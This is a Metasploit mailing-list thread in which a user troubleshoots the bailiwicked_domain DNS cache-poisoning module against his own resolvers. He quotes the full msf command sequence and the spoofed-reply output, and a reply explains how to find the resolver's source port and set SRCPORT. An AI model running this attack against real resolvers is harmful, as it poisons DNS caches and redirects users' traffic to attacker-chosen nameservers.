bailiwicked_domain not working anymore?

[j.s.sebastian at gmail.com (Paolo Milani)]

Hi,

I had the same problem. The thing is that the authoritative nameserver
used to find out the source port used by the recursive server is not
running anymore.

Quoting my previous email to this list:

"To check if a server is vulnerable (uses a static source port),  and to
find out which port it uses, this module sends TXT queries for domains like:

spoofprobe-check-1-9997847822.red.metasploit.com

I presume that the server for the red subdomain should then reply
putting the port number used by the server in the TXT section.

Unfortunately this server is down (in fact, the red subdomain does not
resolve)."

Since sending back the src port of the server in the TXT section is not
standard DNS behavior, and the code for this server doesn't seem to have
been released, even if you set up your own authoritative server the
check functionality will still not work.

Of course you can set up your own authoritative server, do a query to it
through the recursive resolver, and just check which port it uses to
query you. Then in metasploit you can just do set SRCPORT <port number>.

ciao
Paolo Milani




Richard Miles wrote:
> Yo
>
> I recently tested the bailiwicked_domain exploit from Metasploit
> against 2 different servers, and both failed the exploitation.
>
> Both servers show to be vulnerable, similar to this one output:
>
> porttest.y.x.w.v.u.t.s.r.q.p.o.n.m.l.k.j.i.h.g.f.e.d.c.b.a.pt.dns-oarc.net.
> "myDNSserver is POOR: 26 queries in 1.9 seconds from 26 ports with std dev 7"
>
> I used this test:
>
> dig +short porttest.dns-oarc.net TXT @myDNSserver
>
> Both DNS servers show to be vulnerable (POOR).
>
> When exploit with Metasploit, the first problem is that "check" always
> fail saying my DNS doesn't accept recursive queries.
>
> msf auxiliary(bailiwicked_domain) > check
>
> [*] Using the Metasploit service to verify exploitability...
> [*] ERROR: This server is not replying to recursive requests
>
>
> That is completely wrong, my server accept recursive queries. Even if
> I quit metasploit or even open another terminal I can query ANY host
> in the internet. Is it a know problem?
>
> Well, anyway I tried to exploit the flaw, using this:
>
> msf > use auxiliary/spoof/dns/bailiwicked_domain
> msf auxiliary(bailiwicked_domain) > set RHOST myDNSserver
> RHOST => myDNSserver
> msf auxiliary(bailiwicked_domain) > set DOMAIN sexy.com
> DOMAIN => sexy.com
> msf auxiliary(bailiwicked_domain) > set NEWDNS www.google.com
> NEWDNS => www.google.com
> msf auxiliary(bailiwicked_domain) > set SRCPORT 0
> SRCPORT => 0
> msf auxiliary(bailiwicked_domain) > exploit
>
> [*] Targeting nameserver myDNSserver for injection of sexy.com.
> nameservers as www.google.com
> [*] Querying recon nameserver for sexy.com.'s nameservers...
> [*]  Got an NS record: XXXXXXXXXXXXXXXX
> [*]     Removed: It's just DNS resolution.
> [*] Calculating the number of spoofed replies to send per query...
> [*]   race calc: 100 queries | min/max/avg time: 0.04/0.17/0.07 |
> min/max/avg replies: 4/67/28
> [*] Sending 14 spoofed replies from each nameserver (3) for each query
> [*] Attempting to inject poison records for sexy.com.'s nameservers
> into myDNSserver:0...
> [*] Sent 1000 queries and 42000 spoofed responses...
> [*] Recalculating the number of spoofed replies to send per query...
> [*]   race calc: 25 queries | min/max/avg time: 0.04/103.53/4.22 |
> min/max/avg replies: 3/65337/2633
> [*] Now sending 1316 spoofed replies from each nameserver (3) for each query
>
> And the Metasploit keeps in this stage for a long time (at the moment,
> more than 1 hour).
>
> There is anything wrong with the exploit? Or I'm using it wrong?
>
> I'm following this tutorial:
>
> http://www.caughq.org/exploits/CAU-EX-2008-0003.txt
>
> Any tips are welcome.
>
> thanks
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework